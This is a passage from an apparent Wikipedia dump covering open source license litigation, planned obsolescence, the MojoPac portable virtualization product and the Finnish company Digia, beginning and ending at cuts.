as tsunami warning sirens along the Oregon coast. While there are no plans to remove the remaining sirens, the city of Longview has removed a few of the sirens on an as-needed basis to make way for other projects. Heliport Trojan Heliport was a 60 x 60 ft (18 x 18 m) private turf heliport located at the power plant. It appears to be defunct at this time. References External links Portland General Electric information about the plant (archived version of page from August 2008 available from archive.org) Local television news coverage of the implosion from many different angles High Country News article providing some of the timeline of the plant
https://en.wikipedia.org/wiki/Open%20source%20license%20litigation
Open source license litigation
Free and open source software is distributed under a variety of free-software licenses which differ significantly from other kinds of software license. Legal action against these licences involves questions about their validity and enforceability. This page lists significant open source license litigation to illustrate the legal system's approach to these licenses. Open source license copyright litigation Jacobsen v Katzer (2008) Jacobsen v Katzer addressed the extent to which a copyright holder of free public use software can control the modification and use of their work by another party. Jacobsen made code available for public download under an open source public license, Artistic License 1.0, which Katzer copied into their own commercial software products without recognition of the source of the code. Jacobsen argued that the terms of the license defined the scope what the code could be used for and that any use outside of these restrictions would be a copyright infringement. The license holder here expressly stated the terms upon which the right to modify and distribute the material depended. The United States Federal Circuit Court of Appeals established that these license terms are enforceable copyright conditions. Katzer had failed to affix the required copyright notices to the derivative software, which therefore was an infringement of the license. The case established that violations of open source licenses can be treated as copyright claims. BusyBox litigation (2007-13) During 2007 to 2009, Software Freedom Law Center (SFLC) filed a series of copyright infringement lawsuits on behalf the principal developers of BusyBox. These lawsuits claimed violations of the GNU General Public License Version 2. In September 2007 they filed a lawsuit against Monsoon Multimedia, Inc. alleging that Monsoon had violated the GPL by including BusyBox code in some of their products without releasing the source code. In October 2007, an SFLC press release announced that the lawsuit had been settled with Monsoon agreeing to comply with the GPL and pay a sum of money to the plaintiffs. In November 2007 they filed a lawsuit against Xterasys Corporation and High-Gain Antennas, LLC. In December 2007, SFLC announced a settlement; Xterasys agreed to stop shipping infringing products until it published the complete source code for the GPL’d code and to pay an undisclosed sum to the plaintiffs. In December 2007 SFLC filed a lawsuit against Verizon Communications, Inc. alleging that Verizon had violated the GPL by distributing BusyBox in wireless routers bundled with the FiOS fiber optic bandwidth service, without providing corresponding source code. A settlement announced In March 2008, included an agreement to comply with the GPL and an undisclosed sum paid to the plaintiffs. In December 2009, they filed a lawsuit against 14 companies, including Best Buy, Samsung, and Westinghouse with the same allegations of violation of the GPL. By the end of September 2013, all of the defendant companies had agreed on settlement terms, except for Westinghouse, against whom default judgment was entered. Free Software Foundation, Inc. v. Cisco Systems, Inc (2009) This was a lawsuit initiated by the Free Software Foundation (FSF) against Cisco Systems on December 11, 2008 in the United States District Court for the Southern District of New York. 
The FSF claimed that various products sold by Cisco under the Linksys brand had violated the licensing terms of many programs on which FSF held copyright, including GCC, GNU Binutils, and the GNU C Library. Most of these programs were licensed under the GNU General Public License Version 2, and a few under the GNU Lesser General Public License. The Software Freedom Law Center acted as the FSF's lawyers in the case, asking the court to enjoin Cisco from further distributing Linksys firmware that contained FSF copyrighted code, and also asked for damages amounting from all profits that Cisco received "from its unlawful acts." The FSF contended that code to which it held the copyright was found in multiple Linksys models, and in the program QuickVPN. On May 20, 2009 the parties announced a settlement that included Cisco appointing a director to ensure Linksys products comply with free-software licenses, and Cisco making an undisclosed financial contribution to the FSF. Open source license as a contract litigation Artifex Software Inc v Hancom Inc (2017) Leading on from Jacobsen v Katzer this case, from the United States District Court, N.D. California, focused on the breaches of open source software licenses, but extended to contract breaches as well as copyright infringements. Artifex is the exclusive licensor of the software product, ‘Ghostscript’, under the GNU General Public License Version 3. Hancom is a South Korean software company that used Ghostscript in software they were selling. This case concerned Hancom's failure to distribute or offer to provide the source code for their software. The GNU GPL provides that the Ghostscript user agrees to its terms, thus creating a contract, if the user does not obtain a commercial license. Artifex alleged that Hancom did not obtain a commercial license to use Ghostscript, and represented publicly that its use of Ghostscript was licensed under the GNU GPL. These allegations sufficiently plead the existence of a contract. This case establishes that the GNU GPL constitutes a contract between the owner of the source code and the person/company that uses that code through the license. This sets the precedent that allows licensors to bring claims of breach of contract where the terms of a license are not complied with. SCO Group Inc v International Business Machines Corporation (2017) This was a case decided through the United States Court of Appeals for the Tenth Circuit. It covered a complex contractual matrix with claims made in tort across the contractual duties. In the end it created a stir in the open source community as the claims of ownership over code were disputed. Eben Moglen, the counsel for the Free Software Foundation, released a statement regarding the lawsuit: As to its trade secret claims, which are the only claims actually made in the lawsuit against IBM, there remains the simple fact that SCO has for years distributed copies of the kernel, Linux, as part of GNU/Linux free software systems. [...] There is simply no legal basis on which SCO can claim trade secret liability in others for material it widely and commercially published itself under [the GNU GPL Version 2] that specifically permitted unrestricted copying and distribution. The SCO Group announced on May 14, 2003, that they would no longer distribute Linux. SCO said that it would "continue to support existing SCO Linux and Caldera OpenLinux customers and hold them harmless from any SCO intellectual property issues regarding SCO Linux and Caldera OpenLinux products". 
SCO claimed and maintains that any of its code that was GPL'd was released by employees without proper authorization, and thus the license did not stand legally. This is supported by the fact that for code to be GPL'd, the copyright owner must put a GPL notice before the code, and SCO itself was not the one to add the notices. Software patenting litigation Diamond v Diehr (1981), Bilski v Kappos (2010), and Alice Corporation Pty Ltd v CLS Bank International (2014) These cases, decided in the Supreme Court of the United States, set out the law around what makes an invention patent-eligible in reference to computer programs. It was stated that to transform an abstract idea into a patent-eligible process requires more than simply stating the idea followed by the words "apply it"; accordingly, simply implementing a program on a computer is not a patentable application. This is because if you take away the computer then all that is left is the abstract idea, which is not a process or another accepted creation, and is therefore not patentable. The only case in which a patent-eligible process is qualified by its implementation on a computer is where it improves an existing technological process. So computer programs cannot be patented, but can be copyrighted. The Software Freedom Law Center submitted a brief to the United States Court of Appeals for the Federal Circuit in Alice Corporation v CLS Bank to support the long-standing court precedents limiting patent rights for computer programs. The open source community has an interest in limiting the reach of patent law so that free software development is not impeded. The SFLC showed its support for the "machine or transformation" test, which only allows patents for computer software processes that include a special-purpose apparatus, not merely a general-purpose computer, to execute the program. The Court's decision reflected the ideas set out in the SFLC submission. Enfish LLC v Microsoft Corp (2016) In this case, a software patent was questioned and ruled valid. The ruling was that an invention's ability to run on a general-purpose computer does not preclude it from being patent eligible. Antitrust litigation Wallace v. International Business Machines Corp (2006) This case, decided at the Court of Appeals for the Seventh Circuit, held that under United States law the GNU GPL Version 2 did not contravene federal antitrust laws. This suit came after the dismissed action, Wallace v Free Software Foundation (2006), where the Foundation and the GPL Version 2 specifically came under fire for price fixing. Wallace's argument was that the 'copyleft' system created by the Free Software Foundation is a project with IBM, Novell and Red Hat to undercut the prices of potential rivals. It was argued that this could be governed under antitrust law, which regulates predatory pricing. The effect would be to shut down a process where a company or companies undercut the competition to gain a monopoly, and then exploit it by raising prices. The purpose of the law is to protect consumers from this process and to promote rivalry that keeps prices low. However, Mr. Wallace was attempting to use antitrust law to drive prices up, suggesting that it was impossible to compete with their prices. Under antitrust law Wallace had to prove not only an injury to himself but also an injury to the market, which he failed to do. The claim was quickly dismissed, as the number of proprietary operating systems was growing and there continues to be competition in the market despite some being free of charge.
So it was confirmed that the GPL and open source software cannot be challenged under antitrust laws. Open source software fair use litigation Oracle America Inc v. Google Inc (2018) This was a case decided in the United States Federal Circuit Court of Appeals in 2018, which concerned the fair use by Google of the source code licensed by Oracle under the GNU GPL Version 2. Google had copied 37 Application Programming Interface packages (APIs) to aid in the building of its free Android software for smartphones. Google had taken these APIs, written its own implementing code, and launched a product which competed with Oracle's. The conditions of the license were that improvements of the code, or derivative code, had to be shared for free use. If somebody wanted to avoid this but still use the APIs, or where they would be competing with the owners of the code, then they would need to pay a licensing fee. Google used the APIs without paying a licensing fee but competed with Oracle's product, which Oracle contended was a breach of copyright. The Court of Appeals decided in favor of Oracle, after considering what would make a fair use of the code, with Google failing on a majority of the factors. On November 15, 2019, the United States Supreme Court agreed to hear Google's appeal on the same question, with roughly $9 billion in damages hanging over Google if it lost again. In April 2021, the Supreme Court ruled in a 6–2 decision that Google's use of the Java APIs fell within the four factors of fair use, bypassing the question of whether APIs can be copyrighted. The decision reversed the Federal Circuit ruling and remanded the case for further review. Open source software trade secrets litigation A Korean case (2005) A September 2005 case from the Seoul Central District Court considered the issue of defendants conducting business for a rival company using source code from a program developed by the company for which they had previously worked, licensed under the GNU GPL Version 2. Trade secrets are protectable if their contents are of competitive property value and, unlike patents, are not required to be novel or progressive. The purpose of prohibiting trade secret infringement is to avoid unfair advantage, stopping companies from obtaining a favorable head-start over competitors that places them in a superior position. One defendant retired from their company and kept a copy of the source code privately, providing it to the rival company and shortening the development period by two months. The Court ruled that the GPL was not material to the case. The defendants argued that it is impossible to maintain trade secrets while being compliant with the GPL and distributing the work, so they could not be in breach of trade secrets. This argument was considered groundless and the defendants were sentenced following criminal proceedings. Other/international open source license litigation Planetary Motion v. Techsplosion (2001) United States Court of Appeals, Eleventh Circuit case, "Software distributed pursuant to [the GPL] is not necessarily ceded to the public domain" (dicta). Computer Associates v. Quest (2004) This case, decided in the United States District Court, N.D. Illinois, Eastern Division, held that the fact that Computer Associates' source code contains previously known source code (GNU Bison Version 1.25), available under the GPL, does not prevent the company from protecting its own source code.
There is a special exception in the GPL to allow the use of output files without the usual restrictions for versions of Bison after and including version 1.25. Welte v. Sitecom Germany (2004) In April 2004 a preliminary injunction against Sitecom Germany was granted by the Munich District Court after Sitecom refused to cease distribution of Netfilter's GPL'ed software in violation of the terms of the GPL Version 2. The court's justification was: "Defendant has infringed on the copyright of plaintiff by offering the software 'netfilter/iptables' for download and by advertising its distribution, without adhering to the license conditions of the GPL. Said actions would only be permissible if defendant had a license grant." Welte v. D-Link (2006) On 6 September 2006 in the District Court of Frankfurt, the gpl-violations.org project prevailed in court litigation against D-Link Germany GmbH regarding D-Link's copyright-infringing use of parts of the Linux kernel in devices they distributed. The judgment stated that the GPL is valid, legally binding, and stands in German court. AFPA v. Edu4 (2009) On September 22, 2009, the Paris Court of Appeals ruled that the company Edu4 violated the terms of the GNU GPL Version 2 when it distributed binary copies of the remote desktop access software VNC but denied users access to its corresponding source code. Olivier Hugot, attorney of Free Software Foundation France, said: "Companies distributing the software have been given a strong reminder that the license's terms are enforceable under French law. And users in France can rest assured that, if need be, they can avail themselves of the legal system to see violations addressed and their rights respected...But what makes this ruling unique is the fact that the suit was filed by a user of the software, instead of a copyright holder. It's a commonly held belief that only the copyright holder of a work can enforce the license's terms - but that's not true in France. People who received software under the GNU GPL can also request compliance, since the license grants them rights from the authors." Free/Iliad (2011) This was an October 2008 case from the Paris Regional Court (Tribunal de Grande Instance de Paris). Free/Iliad is an ISP; the routers it distributes contain software under GPL Version 2, but Free/Iliad provided neither the source code nor the GPL text. Free/Iliad's argument was that the routers remain its property (not sold to customers) and stay on its network, which would not amount to "distribution" in the terms of the GPL. A secret extra-judicial agreement was reached in July 2011. Free has since released the source code and informed users of the GPL software in their routers. China's court rulings on open-source licensing (2018) The Beijing Intellectual Property Court (BIPC) saw a case from business-software developer Digital Heaven claiming that software developer YouZi had copied the code for three plug-ins contained in its development tool "HBuilder". The court found in 2018 that YouZi had violated copyright, a decision that proved controversial because the legal test employed by the court differed from the reasoning used by United States courts. YouZi argued that, since HBuilder is based on an open-source module known as "Aptana", which is licensed under the GNU General Public License Version 3, HBuilder is also open source software whose source code anybody should be entitled to use. The BIPC decided it was only necessary to identify whether the three specific plug-ins used by YouZi are subject to the GPL.
The Aptana-GPL Exception License stipulates that works which are identifiable sections of the modified version, and which can be seen as independent works, do not fall under the GPL. Without further examination of the open-source licences, the court ruled that the GPL did not apply to the three plug-ins and that HBuilder therefore could not be considered a derivative work licensed under the GPL. References Free and open-source software Litigation by party
497852
https://en.wikipedia.org/wiki/Planned%20obsolescence
Planned obsolescence
In economics and industrial design, planned obsolescence (also called built-in obsolescence or premature obsolescence) is a policy of planning or designing a product with an artificially limited useful life or a purposely frail design, so that it becomes obsolete after a certain pre-determined period of time upon which it decrementally functions or suddenly ceases to function, or might be perceived as unfashionable. The rationale behind this strategy is to generate long-term sales volume by reducing the time between repeat purchases (referred to as "shortening the replacement cycle"). It is the deliberate shortening of a lifespan of a product to force people to purchase functional replacements. Planned obsolescence tends to work best when a producer has at least an oligopoly. Before introducing a planned obsolescence, the producer has to know that the customer is at least somewhat likely to buy a replacement from them (see brand loyalty). In these cases of planned obsolescence, there is an information asymmetry between the producer, who knows how long the product was designed to last, and the customer, who does not. When a market becomes more competitive, product lifespans tend to increase. For example, when Japanese vehicles with longer lifespans entered the American market in the 1960s and 1970s, American carmakers were forced to respond by building more durable products. History In 1924, the American automobile market began reaching saturation point. To maintain unit sales, General Motors executive Alfred P. Sloan Jr. suggested annual model-year design changes to convince car owners to buy new replacements each year, with refreshed appearances headed by Harley Earl and the Art and Color Section. Although his concept was borrowed from the bicycle industry, its origin was often misattributed to Sloan. Sloan often used the term dynamic obsolescence, but critics coined the name of his strategy planned obsolescence. This strategy had far-reaching effects on the automobile industry, product design field and eventually the whole American economy. The smaller players could not maintain the pace and expense of yearly re-styling. Henry Ford did not like the constant stream of model-year changes because he clung to an engineer's notions of simplicity, economies of scale, and design integrity. GM surpassed Ford's sales in 1931 and became the dominant company in the industry thereafter. The frequent design changes also made it necessary to use a body-on-frame structure rather than the lighter, but less easy to modify, unibody design used by most European automakers. The origin of the phrase planned obsolescence goes back at least as far as 1932 with Bernard London's pamphlet Ending the Depression Through Planned Obsolescence. The essence of London's plan would have the government impose a legal obsolescence on personal-use items, to stimulate and perpetuate purchasing. However, the phrase was first popularized in 1954 by Brooks Stevens, an American industrial designer. Stevens was due to give a talk at an advertising conference in Minneapolis in 1954. Without giving it much thought, he used the term as the title of his talk. From that point on, "planned obsolescence" became Stevens' catchphrase. By his definition, planned obsolescence was "Instilling in the buyer the desire to own something a little newer, a little better, a little sooner than is necessary." The phrase was quickly taken up by others, but Stevens' definition was challenged. 
By the late 1950s, planned obsolescence had become a commonly used term for products designed to break easily or to quickly go out of style. In fact, the concept was so widely recognized that in 1959 Volkswagen mocked it in an advertising campaign. While acknowledging the widespread use of planned obsolescence among automobile manufacturers, Volkswagen pitched itself as an alternative. "We do not believe in planned obsolescence", the ads suggested. "We don't change a car for the sake of change." In the famous Volkswagen advertising campaign by Doyle Dane Bernbach, one advert showed an almost blank page with the strapline "No point in showing the 1962 Volkswagen, it still looks the same". In 1960, cultural critic Vance Packard published The Waste Makers, promoted as an exposé of "the systematic attempt of business to make us wasteful, debt-ridden, permanently discontented individuals". Packard divided planned obsolescence into two sub categories: obsolescence of desirability and obsolescence of function. "Obsolescence of desirability", a.k.a. "psychological obsolescence", referred to marketers' attempts to wear out a product in the owner's mind. Packard quoted industrial designer George Nelson, who wrote: Design ... is an attempt to make a contribution through change. When no contribution is made or can be made, the only process available for giving the illusion of change is "styling"! Variants Contrived durability Contrived durability is a strategy of shortening the product lifetime before it is released onto the market, by designing it to deteriorate quickly. The design of all personal-use products includes an expected average lifetime permeating all stages of development. Thus, it must be decided early in the design of a complex product how long it should last so that each component can be made to those specifications. Since all matter is subject to entropy, it is impossible for anything to last forever: all products will ultimately break down, no matter what steps are taken. Limited lifespan is only a sign of planned obsolescence if the limit is made artificially short. The strategy of contrived durability is generally not prohibited by law, and manufacturers are free to set the durability level of their products. While often considered planned obsolescence, it is often argued as its own field of anti-customer practices. A possible method of limiting a product's durability is to use inferior materials in critical areas, or suboptimal component layouts which cause excessive wear. Using soft metal in screws and cheap plastic instead of metal in stress-bearing components will increase the speed at which a product will become inoperable through normal usage and make it prone to breakage from even minor forms of abnormal usage. For example, small, brittle plastic gears in toys are extremely prone to damage if the toy is played with roughly, which can easily destroy key functions of the toy and force the purchase of a replacement. The short life expectancy of smartphones and other handheld electronics is a result of constant usage, fragile batteries, and the ability to easily damage them. Prevention of repairs The ultimate examples of such design are single-use versions of traditionally durable goods, such as disposable cameras, where the customer must purchase entire new products after using them just once. 
Such products are often designed to be impossible to service; for example, a cheap "throwaway" digital watch may have a case which is sealed in the factory, with no designed ability for the user to access the interior without destroying the watch entirely. Manufacturers may make replacement parts either unavailable or so expensive that they make the product uneconomic to repair. For example, many inkjet printers incorporate a replaceable print head which eventually fails. However, the high cost of a replacement forces the owner to scrap the entire device. Other products may also contain design features meant to frustrate repairs, such as Apple's "tamper-resistant" pentalobe screws that cannot easily be removed with common personal-use tools, overuse of glue, as well as denying operation if any third-party component such as a replacement home button has been detected. Front-loading washing machines often have the drum bearing, a critical and wear-prone mechanical component, permanently molded into the wash tub, or even have a sealed outer tub, making it impossible to renew the bearings without replacing the entire tub. The cost of this repair may exceed the residual value of the appliance, forcing it to be scrapped. Bosch, despite declaring on its websites that spare parts are available for up to 10 years, fits its popular MaxoMixx mixers with an easily broken plastic latch, refuses to sell the replacement latch to the user, and instead offers the entire drive, consisting of many elements, as a single spare part, which is almost equivalent to buying a new device. According to Kyle Wiens, co-founder of online repair community iFixit, a possible goal for such a design is to make the cost of repairs comparable to the replacement cost, or to prevent any form of servicing of the product at all. In 2012, Toshiba was criticized for issuing cease-and-desist letters to the owner of a website that hosted its copyrighted repair manuals, to the detriment of the independent and home repair market. Batteries Throughout normal use, batteries lose their ability to store energy, output power, and maintain a stable terminal voltage, which impairs computing speeds and eventually leads to system outages in portable electronics. Some portable products highly relied upon in the post-PC era, such as mobile phones, laptops, and electric toothbrushes, are designed in a way that denies end-users the ability to replace their batteries after they have worn down, therefore leaving an aging battery trapped inside the device, which limits the product lifespan to its shortest-lived component. While such a design can help make the device thinner, it makes it difficult to replace the battery without sending the entire device away for repairs or purchasing an entirely new device. On a device with a sealed back cover, a manual (forced) battery replacement might induce permanent damage, including loss of water-resistance due to damage to the water-protecting seal, as well as risking serious, even irreparable damage to the phone's main board as a result of having to pry the battery free from strong adhesive in proximity to delicate components. Some devices are even built so that the battery terminals are covered by the main board, requiring it to be riskily removed entirely before disconnecting the terminals. The manufacturer or a repair service might be able to replace the battery. In the latter case, this could void the warranty on the device.
As such, it forces users who wish to keep their device functional longer to limit their use of energy-demanding device functionality and to forego full recharging. The practice in phone design started with Apple's iPhones and has now spread out to most other mobile phones. Earlier mobile phones (including water-resistant ones) had back covers that could be opened by the user in order to replace the battery. Perceived obsolescence Obsolescence of desirability or stylistic obsolescence occurs when designers change the styling of products so trendsetting customers will purchase the latest styles. Many products are primarily desirable for aesthetic rather than functional reasons. An example of such a product is clothing. Such products experience a cycle of desirability referred to as a "fashion cycle". By continually introducing new aesthetics, and retargeting or discontinuing older designs, a manufacturer can "ride the fashion cycle", allowing for constant sales despite the original products remaining fully functional. Sneakers are a popular fashion industry where this is prevalent—Nike's Air Max line of running shoes is a prime example where a single model of shoe is often produced for years, but the color and material combination ("colorway") is changed every few months, or different colorways are offered in different markets. This has the upshot of ensuring constant demand for the product, even though it remains fundamentally the same. Motor vehicle platforms typically undergo a midlife "facelift"—a cosmetic rather than an engineering change for the purpose of cost effectively increasing customer appeal by making previously manufactured versions of the same fundamental product less desirable. The most simplistic way to achieve this outcome is to offer new paint colors. To a more limited extent this is also true of some personal-use electronic products, where manufacturers will release slightly updated products at regular intervals and emphasize their value as status symbols. The most notable example among technology products are Apple products. New colorways introduced with iterative “S” generation iPhones (e.g. the iPhone 6S’ "Rose Gold") entice people into upgrading and distinguishes an otherwise identical-looking iPhone from the previous year's model. Some smartphone manufacturers release a marginally updated model every 5 or 6 months compared to the typical yearly cycle, leading to the perception that a one-year-old handset can be up to two generations old. A notable example is OnePlus, known for releasing T-series devices with upgraded specifications roughly 6 months after a major release device. Sony Mobile utilised a similar tactic with its Xperia Z-series smartphones. Systemic obsolescence Planned systemic obsolescence is caused either by the withdrawal of investment, or a product becoming obsolete through continuous development of the system in which it is used in such a way as to make continued use of the original product difficult. Common examples of planned systemic obsolescence include changing the design of screws or fasteners so that they cannot easily be operated on with existing tools, thereby frustrating maintenance. This may be intentionally designed obsolescence, a withdrawal of investment or standards being updated or superseded. For example, serial ports, parallel ports, and PS/2 ports have largely been supplanted or usurped by USB on newer PC motherboards since 2000s. 
Programmed obsolescence In some cases, notification may be combined with deliberate artificial disabling of a functional product to prevent it from working, thus requiring the buyer to purchase a replacement. For example, inkjet printer manufacturers employ smart chips in their ink cartridges to prevent them from being used after a certain threshold (number of pages, time, etc.), even though the cartridge may still contain usable ink or could be refilled (with ink toners, up to 50 percent of the toner cartridge is often still full). This constitutes "programmed obsolescence", in that there is no random component contributing to the decline in function. In the Jackie Blennis v. HP class action suit, it was claimed that Hewlett Packard designed certain inkjet printers and cartridges to shut down on an undisclosed expiration date, and at this point customers were prevented from using the ink that remained in the expired cartridge. HP denied these claims, but agreed to discontinue the use of certain messages, and to make certain changes to the disclosures on its website and packaging, as well as compensating affected customers with a total credit of up to $5,000,000 for future purchases from HP. Samsung produces laser printers that are designed to stop working with a message about imaging drum replacing. There are some workarounds for users, for instance, that will more than double the life of the printer that has stopped with a message to replace the imaging drum. In 2021, Canon disabled the scanning function of its Canon Pixma MG6320 all-in-one printers whenever an ink cartridge was out of ink. A class action lawsuit was filed. Software lock-out Another example of programmed obsolescence is making older versions of software (e.g. Adobe Flash Player or YouTube's Android application) unserviceable deliberately, even though they would technically, albeit not economically, be able to keep working as intended. Where older versions of software contain unpatched security vulnerabilities, such as banking and payment apps, deliberate lock out may be a risk-based response to prevent the proliferation of malware in those older versions. If the original vendor of the software is no longer in business, then disabling may occur by another software author as in the case of a web browser disabling a plugin. Otherwise, the vendor who owns a software ecosystem may disable an app that does not comply with a key policy or regulation, such as the processing of personal data to protect user privacy, though in other cases, this does not exclude the possibility of "security reasons" being used for fearmongering. This could be a problem for the user, because some devices, despite being equipped with appropriate hardware, might not be able to support the newest update without modifications such as custom firmware. Additionally, updates to newer versions might have introduced undesirable side effects, such as removed features or compulsory changes, or backwards compatibility shortcomings which might be unsolicited and undesired by users. Software companies sometimes deliberately drop support for older technologies as a calculated attempt to force users to purchase new products to replace those made obsolete. Most proprietary software will ultimately reach an end-of-life point at which the supplier will cease updates and support, usually because the cost of code maintenance, testing and support exceed the revenue generated from the old version. 
As free software and open source software can usually be updated and maintained at lower cost, the end-of-life date can be later. Software that is no longer supported by its manufacturer is sometimes called abandonware. Legal obsolescence Legal obsolescence refers to the undermining of product usability through legislation, as well as to the encouragement of new purchases by offering benefits. For example, governments wanting to increase electric vehicle ownership could increase the replacement rate of cars by subsidising them. Several cities such as London, Berlin, Paris, Antwerp and Brussels have introduced low-emission zones (LEZ) banning older diesel cars. People using such cars in these zones must replace them. Laws and regulations In 2015 the French National Assembly established a fine of up to €300,000 and jail terms of up to two years for manufacturers planning the failure of their products. The rule is relevant not only because of the sanctions that it establishes but also because it is the first time that a legislature recognized the existence of planned obsolescence. These techniques may include "a deliberate introduction of a flaw, a weakness, a scheduled stop, a technical limitation, incompatibility or other obstacles for repair". The European Union is also addressing the practice. The European Economic and Social Committee (EESC), an advisory body of the EU, announced in 2013 that it was studying "a total ban on planned obsolescence". It said replacing products that are designed to stop working within two or three years of their purchase was a waste of energy and resources and generated pollution. The EESC organised a round table in Madrid in 2014 on 'Best practices in the domain of built-in obsolescence and collaborative consumption', which called for sustainable consumption to be a customer right in EU legislation. Carlos Trias Pinto, president of the EESC's Consultative Commission on Industrial Change, supports "the introduction of a labeling system which indicates the durability of a device, so the purchaser can choose whether they prefer to buy a cheap product or a more expensive, more durable product". In 2015, as part of a larger movement against planned obsolescence across the European Union, France passed legislation requiring appliance manufacturers and vendors to declare the intended product lifespans and to inform purchasers how long spare parts for a given product will be produced. From 2016, appliance manufacturers are required to repair or replace, free of charge, any defective product within two years from its original purchase date. This effectively creates a mandatory two-year warranty. Critics and supporters Shortening the replacement cycle has critics and supporters. Philip Kotler argues that: "Much so-called planned obsolescence is the working of the competitive and technological forces in a free society—forces that lead to ever-improving goods and services." Critics such as Vance Packard claim the process is wasteful and exploits customers. With psychological obsolescence, resources are used up making changes, often cosmetic changes, that are not of great value to the customer. Miles Park advocates new and collaborative approaches between the designer and the purchaser to challenge obsolescence in fast-moving sectors such as personal-use electronics. Some people, such as Ronny Balcaen, have proposed creating a new label to counter the diminishing quality of products due to the planned obsolescence technique.
In academia Russell Jacoby, writing in the 1970s, observes that intellectual production has succumbed to the same pattern of planned obsolescence used by manufacturing enterprises to generate ever-renewed demand for their products. See also Artificial demand Bathtub curve—a concept of typical product failure Batterygate—a term used to describe the implementation of performance controls on older models of Apple's iPhone line in order to preserve system stability on degraded batteries Crippleware Defective by Design Durapolist—producer that manipulates the durability of its product Electronics right to repair—government legislation to allow people to repair their own devices Environmental effects of transport Hardware restriction—content protection enforced by electronic components. Interchangeable parts Light-weight Linux distribution—Linux distributions with lower hardware demands than other Linux distributions Phoebus cartel—worked to standardize the life expectancy of light bulbs at 1,000 hours, down from 2,500 hours Prognostics—engineering discipline focused on predicting the life times Repairability Software bloat—successive versions of a computer program requiring ever more computing power Vendor lock-in—making a customer dependent on a vendor for products and services, unable to use another vendor without substantial switching costs. References Further reading Brand management Ethically disputed business practices Marketing techniques Obsolescence Product expiration Right to Repair
7475420
https://en.wikipedia.org/wiki/MojoPac
MojoPac
MojoPac was an application virtualization product from RingCube Technologies. MojoPac turns any USB 2.0 storage device into a portable computing environment. The term "MojoPac" is used by the company to refer to the software application, the virtualized environment running inside this software, and the USB storage device that contains the software and relevant applications. MojoPac supports popular applications such as Firefox and Microsoft Office, and it is also high performance enough to run popular PC Games such as World of Warcraft, Minecraft and Half-Life 2. The RingCube website is currently forwarded to Citrix, which has apparently purchased the company and discontinued MojoPac. Usage To initially set up the MojoPac device, the user runs the installer and selects a USB device attached to the system. Once MojoPac is installed, it creates an executable in the root of that device along with an autorun file that gives the user the option of starting the MojoPac environment automatically when the device is plugged in (subject to how the host PC is configured). Once this application is started, a new Windows Desktop (with its own wallpaper, icons, shell, etc.) is started up in the virtualized MojoPac environment. Any application that runs inside this environment runs off the USB device without affecting the filesystem of the host. A user installs most applications (including Microsoft Office, Adobe Photoshop, Firefox) on the portable storage device by simply running the installer inside this environment. The user can switch between the host environment and the MojoPac environment by using the MojoBar at the top of the screen. Once the user is done with the applications, they exit MojoPac and eject the USB device. To run the applications on a different computer, the user does not need to reinstall the application. The user can plug the portable storage device into any Windows XP computer. All the user's settings, applications, and documents function the same irrespective of which computer the portable storage device is connected to. The computer does not need any special applications or drivers installed to use MojoPac, although administrator rights are required if "MojoPac Usher" has not been installed on the host PC. When the portable storage device is disconnected from the computer, there is no personal information left behind on the computer. Requirements Requires Windows XP Home or Pro; Windows 2000 is not supported, though Vista was planned to be supported in the near future (it never was). Requires Administrator access. A special version, MojoPac Usher, can be run in Universities or other locked down environments if the administrator is present to log in once . A Limited User version was under development. Security MojoPac does not include features to encrypt the data on the USB drive, but does have a password protection system that prevents a person from starting up the MojoPac environment. All the files on the USB drive do not have any additional encryption, which is problematic if the MojoPac device is lost. However, this is no different from a default Windows XP installation and MojoPac can be used together with OTFE software such as FreeOTFE or TrueCrypt to provide any desired strong encryption and plausible deniability (just as Windows XP can). A MojoPac device secured using this type of software is reasonably safe in the case of theft. Because of the virtualization performed by MojoPac, applications running inside the MojoPac environment cannot (generally) modify the host. 
For example, all the browsing history for Internet Explorer and other browsers is stored on the USB device rather than the host. Similarly, if a malicious program tries to delete the C:\Windows directory inside MojoPac, the files on the USB device are deleted, but the files on the host machine will remain. However, it is possible for a user to modify MojoPac's system files, which are then reflected to the same system files of the host PC, so the current level of isolation between the virtual environment and the host PC is not as strong as provided by full machine virtualization technologies like VMware. RingCube has stated this is a known bug which will be addressed in a future version of MojoPac. See also Comparison of application launchers vDesk - a similar product produced by RingCube Portable application creators Windows To Go References External links The Wall Street Journal - Turning Another Computer Into Your Own Lifehacker - Build your 'PC on a stick' with Mojopac Security Now Episode about Mojopac Leo Laporte and Steve Gibson discuss Mojopac in the Security Now podcast A Detailed Article about MojoPac Virtualization software Portable software suites
63260867
https://en.wikipedia.org/wiki/Digia
Digia
Digia Oyj (formerly SYSOPENDIGIA, SysOpen Digia and SysOpen) is a Finnish software company listed on the Helsinki Stock Exchange. Digia focuses especially on financial services, the public sector, social welfare and healthcare, trade, services, industry and energy. In 2020, Digia has more than 1,200 employees in Finland and Sweden (Stockholm). The Finnish offices are located in Helsinki, Jyväskylä, Lahti, Oulu, Rauma, Tampere, Turku and Vaasa. History SysOpen (1990–2004) and Digia (1997–2004) SysOpen was founded in 1990 by Kari Karvinen, Jorma Kylätie and Matti Savolainen. SysOpen was listed on the stock exchange in 1999 and grew strongly through corporate acquisitions until around the turn of the millennium. In 1997, Pekka Sivonen, Mika Malin and Jarkko Virtanen founded Digia Oy. SysOpen Digia 2004–2007 SysOpen Oyj and Digia Oy merged on 4 March 2005 to form SysOpen Digia Oyj. According to Talouselämä magazine, the merger was a cheap way for Digia to get listed on the stock exchange. In the new company, Digia employees were granted the positions of both Chairman of the Board (Pekka Sivonen) and CEO (Jari Mielonen). The reason for this was Digia's better profitability: its earnings before interest, taxes and goodwill amortization were 15 per cent, while SysOpen's were 9 per cent. The new company's main customers included device manufacturers, such as Nokia, operators and corporate customers. In addition to Sivonen, SysOpen-Digia's Board of Directors included Kari Karvinen (Vice Chairman), Pekka Eloholma, Pertti Kyttälä, Matti Mujunen and Mikko Terho. In the summer of 2006, SysOpen Digia Oyj acquired the integration and production management software company Sentera Oyj and Sentera's business was merged into SysOpen Digia. The company's name was changed to SYSOPENDIGIA Oyj in 2007. SysOpen Digia's Pekka Sivonen won the Services category of the Entrepreneur of the Year competition for growth companies organized by Ernst and Young in 2004–2006. SysOpen Digia was Finland's leading integrator of information system and communications, employing 1,100 people with a turnover of EUR 61 million in 2005. Digia 2008–2016 The company was renamed Digia Oyj in 2008. In March 2011, Digia acquired Nokia's Qt commercial and open source licensing and service business. As a subcontractor, Digia suffered from Nokia's problems, resulting in several employer-employee negotiations. The end of Nokia subcontracting led to the loss of one third of turnover as well as employees, but the company's IT services sustained it through the worst times. In 2012, Digia 